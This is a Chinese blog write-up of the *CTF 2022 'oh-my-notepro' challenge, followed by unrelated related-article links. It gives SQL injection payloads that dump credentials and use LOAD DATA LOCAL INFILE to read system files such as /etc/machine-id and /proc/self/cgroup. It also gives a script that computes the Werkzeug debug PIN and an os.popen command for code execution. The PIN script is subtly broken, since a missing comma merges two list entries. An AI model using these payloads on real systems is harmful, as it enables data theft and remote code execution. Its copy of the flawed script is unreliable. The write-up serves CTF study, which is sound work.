oh-my-notepro

最新推荐文章于 2022-06-07 23:11:25 发布
最新推荐文章于 2022-06-07 23:11:25 发布
阅读量1.5k 收藏
点赞数
分类专栏: 比赛复现 文章标签: pin码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124329579
版权 
知识点:求pin码

登录页面后测试可以发现在note_id处可以sql注入。
在这里插入图片描述

%27union%20select%201,2,3,version(),(select%20group_concat(username,0x3a,password)%20from%20users);%23

可以得到用户名和密码,但用处不大。
在这里插入图片描述

pin码

可以用pin码登录控制台来
在这里插入图片描述

3.8的pin码计算脚本如下,需要以下信息:

  1. username,用户名,可以读取/etc/passwd得到
  2. modname,默认值为flask.app
  3. appname,默认值为Flask
  4. moddir,flask库下app.py的绝对路径(报错得到)
  5. uuidnode,当前网络的mac地址的十进制数,通过文件/sys/class/net/eth0/address得到16进制结果,转化为10进制进行计算
  6. machine_id,docker机器id,读取/etc/machine-id ,/proc/sys/kernel/random/boot_id ,/proc/self/cgroup,前两个任选一个与最后一个拼接

app.py 路径

可以再报错处看
在这里插入图片描述

读mac

';create table bbb(name varchar(1000));load data local infile "/sys/class/net/eth0/address" into table ctf.bbb;%23

'union select 1,2,3,4,(select group_concat(name) from ctf.bbb);%23

再转成16进制

#02:42:ac:12:00:03
print(int('0242ac120003',16))
#2485377957891

读/etc/machine-id

';create table machine(name varchar(1000));load data local infile "/etc/machine-id" into table ctf.machine;%23

'union select 1,2,3,4,(select GROUP_CONCAT(name) from ctf.machine)%23

读/proc/self/cgroup

';create table cc(name varchar(1000));load data local infile "/proc/self/cgroup" into table ctf.cc;%23

'union select 1,2,3,4,(select group_concat(name) from ctf.cc);%23

计算pin

#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'ctf'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
    '2485377957891',#  /sys/class/net/eth0/address 16进制转10进制
    #machine_id由三个合并(docker就后两个):1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    '1cc402dd0e11d5ae18db04a6de87223d9cfbff4dca5ae8bd5f82dad5b7b30f43bc41fcde7cf41bdfa213e96595e05ff7'#  /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

拿flag

获得pin码后,到控制台执行命令

__import__("os").popen("cmd").read()

参考

1

2

succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cas-fee-p1:高铁CAS FEE项目1 NotePro
05-24
cas-fee-p1 第三组的HSR CAS FEE Projekt1 NotePro:Felix Adam + MartinBrändli 笔记: app / index.html下的单个应用程序标记文件用于本地存储或数据库的两个DAL(数据抽象层) 在app / test / SpecRunner.html下...
关于ctf中flask算pin总结
arcuied
02-20 4435
flask pin的相关问题
一天一道ctf 第38天(报错模板注入 python沙盒逃逸 pin生成)
scrawman的博客
07-20 622
[GYCTF2020]FlaskApp 先得到{{7*7}}的base64加密字符串,然后解密,输出no no no,看样子是被过滤了,这里可能有SSTI模板注入,主要是看怎么绕过过滤 随便输入字符串让base64解密报错得到文件位置/usr/local/lib/python3.7/site-packages/flask/app.py {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warni
[简单题]PIN-Code Python实现
肥宅_Sean的博客
09-30 823
题目:(codeWar) 原题链接 题目代:(第一个版本) def validate_pin(pin): if pin.isnumeric(): return len(pin) == 4 or len(pin) == 6 else: return False (第二个版本) def validate_pin(pin): if le
Python练习题答案: 观察到的PIN【难度:4级】--景越Python编程实例训练营,1000道上机题等你来挑战
景越Python编程实例训练营
09-04 209
观察到的PIN【难度:4级】: 答案1: from itertools import product ADJACENTS = ('08', '124', '2135', '326', '4157', '52468', '6359', '748', '85790', '968') def get_pins(observed): return [''.join(p) for p in p...
2022-startCTF
unexpectedthing的博客
05-04 1727
前言 这次的题,第二个题前面的sql注入的方法,值得学习。 第三道和第四道题的思路是真的好,学会了很多东西。 oh-my-grafana Grafana是一款用Go语言开发的开源数据可视化工具,可以做数据监控和数据统计,带有告警功能。目前使用grafana的公司有很多,如paypal、ebay、intel等。 这个题就是对CVE-2021-43798 Grafana任意文件读取的复现 比赛才结束一天,这个题的环境就关了,找了NSSCTF平台的环境复现一下 知识点 /public/plugins/aler
*CTF2022 oh-my-notepro
Sk1y的博客
04-19 1081
*CTF2022 oh-my-notepro 文章目录*CTF2022 oh-my-noteprosql注入读文件,得pin1. 用户名2. app.py路径3. 读mac4. 读/etc/machine-id5. 读/proc/self/cgroupexp 登录挺宽松就登录了,note-id是在sql数据库中查找的,可以得到notes表名 sql注入 存在sql注入,查看回显点 %27union%20select%201,2,3,4,5;%23 4 5 都是 版本号 %27union%20sele
[2022-* CTF]-WEB
qq_53142368的博客
06-07 509
这次比赛体验也还行,题目质量出的很高,把wp记录下来 WEB: oh-my-grafana 这个题目考的是grafana任意文件读取漏洞(CVE-2021-43798) 2021年12月6日,国外安全研究人员检测出grafana中某些接口在提供静态文件时,攻击者通过构造恶意请求,可造成目录遍历,读取系统上的文件。 读取敏感文件复现poc: /public/plugins/alertlist/../../../../../../../../etc/passwd /public/plugins/alertli
*CTF-2022 WEB
qq_53263789的博客
04-24 840
oh-my-notepro python3.8 pin计算 发现sql注入,可以堆叠注入 生成要素 username, 通过getpass.getuser()读取,通过文件读取/etc/passwd modname, 通过getattr(mod,“file”,None)读取,默认值为flask.app appname, 通过getattr(app,“name”,type(app).name)读取,默认值为Flask moddir, 在flask库下app..
【*CTF web部分writeup】
weixin_45751765的博客
04-18 2647
1NDEXGrafanaLottoNotepro Grafana CVE-2021-43798 读到这些文件 一开始想的用脚本解密db文件里加过密的密,但发现datasource是空的…. 回头过一下配置文件 过到一个明文密 本来以为要在哪里getshell, 翻插件翻到mysql 试了一下默认的 成功添加数据源 更换数据源后 有个edit sql直接查询 Lotto 大致意思就是上传forecast猜 最后和lotto_result结果对比 审计到这很可疑的环境变量赋值并且有safe
Xiaomi_Kernel_OpenSource,小米内核开源:cancro kk oss(包含mi 3w、mi 3c、mi 4系列、mi note)、armani jb oss(h1s)、dior kk oss(hm note-lte)、法拉利l-oss(小米4i)、thmoas kk oss(hm2 lte)、libra-l-oss(小米4c、小米4s和小米notepro)、kenzo-l-oss(hm note3)、ido-l-oss(redme 3和redmi 2 android l)。GUCCI
09-26
cancro kk oss(包含mi 3w、mi 3c、mi 4系列、mi note)、armani jb oss(h1s)、dior kk oss(hm note-lte)、法拉利l-oss(小米4i)、thmoas kk oss(hm2 lte)、libra-l-oss(小米4c、小米4s和小米notepro)、...
NotePro(Wordpad替代软件)v4.41官方免费安装版
07-29
NotePro是一款wordpad替代软件,支持多文档界面,支持全部文本格式、URL检测、最小化到系统托盘、内置书签、计算器等,快来下载体验吧。 软件介绍 NotePro支持多文档界面的Wordpad 替代软件,支持全部的文本格式、...
TWRP-Recovery-for-Xiaomi-Note-Pro:小米Note pro的TWRP恢复设备文件
05-20
TWRP恢复小米笔记Pro 小米Note pro的TWRP恢复设备文件。 其中包括2 portrait.xml:英语和简体中文。 所有图像资源均适用于1440x2560屏幕。
Python优秀项目 基于Flask+MySQL实现的玩具电子商务网站源+部署文档+数据资料.zip
05-25
CSDN IT狂飙上传的代均可运行,功能ok的情况下才上传的,直接替换数据即可使用,小白也能轻松上手 【资源说明】 Python优秀项目 基于Flask+MySQL实现的玩具电子商务网站源+部署文档+数据资料.zip 1、代压缩包内容 代的项目文件 部署文档文件 2、代运行版本 python3.7或者3.7以上的版本;若运行有误,根据提示GPT修改;若不会,私信博主(问题描述要详细) 3、运行操作步骤 步骤一:将代的项目目录使用IDEA打开(IDEA要配置好python环境) 步骤二:根据部署文档或运行提示安装项目所需的库 步骤三:IDEA点击运行,等待程序服务启动完成 4、python资讯 如需要其他python项目的定制服务,可后台私信博主(注明你的项目需求) 4.1 python或人工智能项目辅导 4.2 python或人工智能程序定制 4.3 python科研合作 Django、Flask、Pytorch、Scrapy、PyQt、爬虫、可视化、大数据、推荐系统、人工智能、大模型
人脸识别例子,利用python调用opencv库
05-25
人脸识别例子
densenet模型-基于深度学习对手势方向识别-不含数据集图片-含逐行注释和说明文档.zip
05-25
densenet模型_基于深度学习对手势方向识别-不含数据集图片-含逐行注释和说明文档 本代是基于python pytorch环境安装的。 下载本代后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代的整体介绍 总共是3个py文件,十分的简便 且代里面的每一行都是含有中文注释的,小白也能看懂代 然后是关于数据集的介绍。 本代是不含数据集图片的,下载本代后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代进行训练了。 运行01生成txt.py,是将数据
数据仓库实例【41页】.ppt
05-25
数据仓库实例【41页】
自回归模型,线性回归预测
最新发布
05-25
线性回归预测 在多元线性回归模型中,我们通过对多个预测变量(predictor)的线性组合预测了目标变量(variable of interest)。在自回归模型中,我们则是基于目标变量历史数据的组合对目标变量进行预测。自回归一词中的自字即表明其是对变量自身进行的回归。
densenet模型-通过CNN训练识别水瓶是否装满-不含数据集图片-含逐行注释和说明文档.zip
05-25
densenet模型_通过CNN训练识别水瓶是否装满-不含数据集图片-含逐行注释和说明文档 本代是基于python pytorch环境安装的。 下载本代后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代的整体介绍 总共是3个py文件,十分的简便 且代里面的每一行都是含有中文注释的,小白也能看懂代 然后是关于数据集的介绍。 本代是不含数据集图片的,下载本代后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代进行训练了。 运行01生成txt.py,是将
alexnet模型-基于深度学习识别古代织物图案风格鉴定-不含数据集图片-含逐行注释和说明文档.zip
05-25
alexnet模型_基于深度学习识别古代织物图案风格鉴定-不含数据集图片-含逐行注释和说明文档 本代是基于python pytorch环境安装的。 下载本代后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代的整体介绍 总共是3个py文件,十分的简便 且代里面的每一行都是含有中文注释的,小白也能看懂代 然后是关于数据集的介绍。 本代是不含数据集图片的,下载本代后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代进行训练了。 运行01生成txt.py,

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值